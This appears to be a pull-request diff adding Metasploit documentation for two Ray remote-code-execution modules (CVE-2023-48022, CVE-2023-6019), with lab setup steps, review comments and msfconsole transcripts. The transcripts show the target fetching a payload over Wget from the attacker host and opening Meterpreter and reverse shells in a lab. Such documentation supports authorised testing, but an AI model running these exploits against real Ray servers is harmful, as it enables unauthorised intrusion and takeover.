Land #19363, Ray Modules CVE-2023-6019 CVE-2023-6020 CVE-2023-48022
@@ -0,0 +1,103 @@
## Vulnerable Application

Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint (CVE-2023-48022)

The vulnerability affects:

* Ray (<=v2.6.3)

This module was successfully tested on:

* Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15

### Install and run the vulnerable Ray (v2.6.3)

1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Pull pre-built Ray docker container (v2.6.3) in your VM.
`docker pull rayproject/ray:2.6.3`
4. Start the ray container.
`docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
5. Start ray.
`ray start --head --dashboard-host=0.0.0.0`

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/ray_agent_job_rce`
4. Do: `set rhost <rhost>`
5. Do: `set lhost <attacker-ip>`
6. Do: `run`
7. You should get a shell or meterpreter

## Options

No options

## Scenarios

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)

```
msf6 > use exploit/linux/http/ray_agent_job_rce
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_agent_job_rce) > check
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
msf6 exploit(linux/http/ray_agent_job_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Command execution successful. Job ID: 'raysubmit_EJDSK2BrhAP8j69n' Submission ID: 'raysubmit_EJDSK2BrhAP8j69n'
[*] Using URL: http://192.168.56.1:8080/kOZWO5HA3wWm2Hh
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /kOZWO5HA3wWm2Hh
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 192.168.56.6
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:42052) at 2024-08-10 10:45:48 +0900
[*] Server stopped.

meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.6.15-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)

```
msf6 > use exploit/linux/http/ray_agent_job_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_agent_job_rce) > set target 1
target => 1
msf6 exploit(linux/http/ray_agent_job_rce) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/ray_agent_job_rce) > check
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
msf6 exploit(linux/http/ray_agent_job_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Command execution successful. Job ID: 'raysubmit_RNpiJJt2feNrUrwN' Submission ID: 'raysubmit_RNpiJJt2feNrUrwN'
[*] Using URL: http://192.168.56.1:8080/QtpKXmqA8kq
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /QtpKXmqA8kq
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:35136) at 2024-08-10 10:47:37 +0900
[*] Server stopped.

whoami
ray
pwd
/home/ray
```

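Review bot: the Options section says "No options", yet the target-1 scenario in this same file depends on `set target 1` together with `set payload linux/x86/shell/reverse_tcp`, so the documentation should list the module's targets and what distinguishes them (the two scenarios suggest an x64 Meterpreter target and an x86 shell target). It should also spell out that `check` only confirms a listener on 8265 ("The service is running, but could not be validated") and is not a version fingerprint, so AutoCheck will not stop the exploit from being fired at a patched or unrelated service. Two smaller points in the install steps: step 5 (`ray start --head --dashboard-host=0.0.0.0`) should say it is typed in the container shell that step 4 opens via `docker run ... -it`, since as written it reads as a host command; and the "<=v2.6.3" bound under "The vulnerability affects" is wider than the single version listed under "successfully tested on", so either cite where that bound comes from or qualify it.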
@@ -0,0 +1,103 @@
## Vulnerable Application

Ray (<=v2.6.3) is vulnerable to RCE via cpu_profile command injection vulnerability (CVE-2023-6019)

The vulnerability affects:

* Ray (<=v2.6.3)

This module was successfully tested on:

* Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15

### Install and run the vulnerable Ray (v2.6.3)

1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Pull pre-built Ray docker container (v2.6.3) in your VM.
`docker pull rayproject/ray:2.6.3`
4. Start the ray container.
`docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
5. Start ray.
`ray start --head --dashboard-host=0.0.0.0`

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019`
4. Do: `set rhost <rhost>`
5. Do: `set lhost <attacker-ip>`
6. Do: `run`
7. You should get a shell or meterpreter

## Options

No options

## Scenarios

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)

```
msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Grabbed node info, pid: 129, ip: 172.17.0.2
[*] Using URL: http://192.168.56.1:8080/2W4ZJ30NqjnfoGE
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /2W4ZJ30NqjnfoGE
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 192.168.56.6
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:59072) at 2024-08-10 10:29:05 +0900
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.6.15-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)

```
msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set target 1
target => 1
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Grabbed node info, pid: 129, ip: 172.17.0.2
[*] Using URL: http://192.168.56.1:8080/Mz2SC2mlSp
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /Mz2SC2mlSp
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:59210) at 2024-08-10 10:30:49 +0900
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.

whoami
ray
pwd
/home/ray
```

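Review bot: the scenario line `[+] Grabbed node info, pid: 129, ip: 172.17.0.2` shows that the module first reads the node's pid and IP from the dashboard before it sends the cpu_profile request, but nothing in the Vulnerable Application or Verification Steps text states that prerequisite; add a sentence saying the exploit depends on that node lookup and that a run which stops before the "Grabbed node info" line has failed at the lookup, not at the stager or payload, so users can tell the two failure modes apart. The same two gaps as in the `ray_agent_job_rce` documentation apply here: "No options" under Options contradicts the `set target 1` / `set payload linux/x86/shell/reverse_tcp` scenario, and the `check` result "The service is running, but could not be validated" is a liveness check rather than a version check, so list the targets and qualify the check. Minor: in both scenarios "Command Stager progress - 100.00% done" is printed after the session-opened line; if that is only output interleaving no change is needed, but it is worth a glance at the module's stager flow before landing.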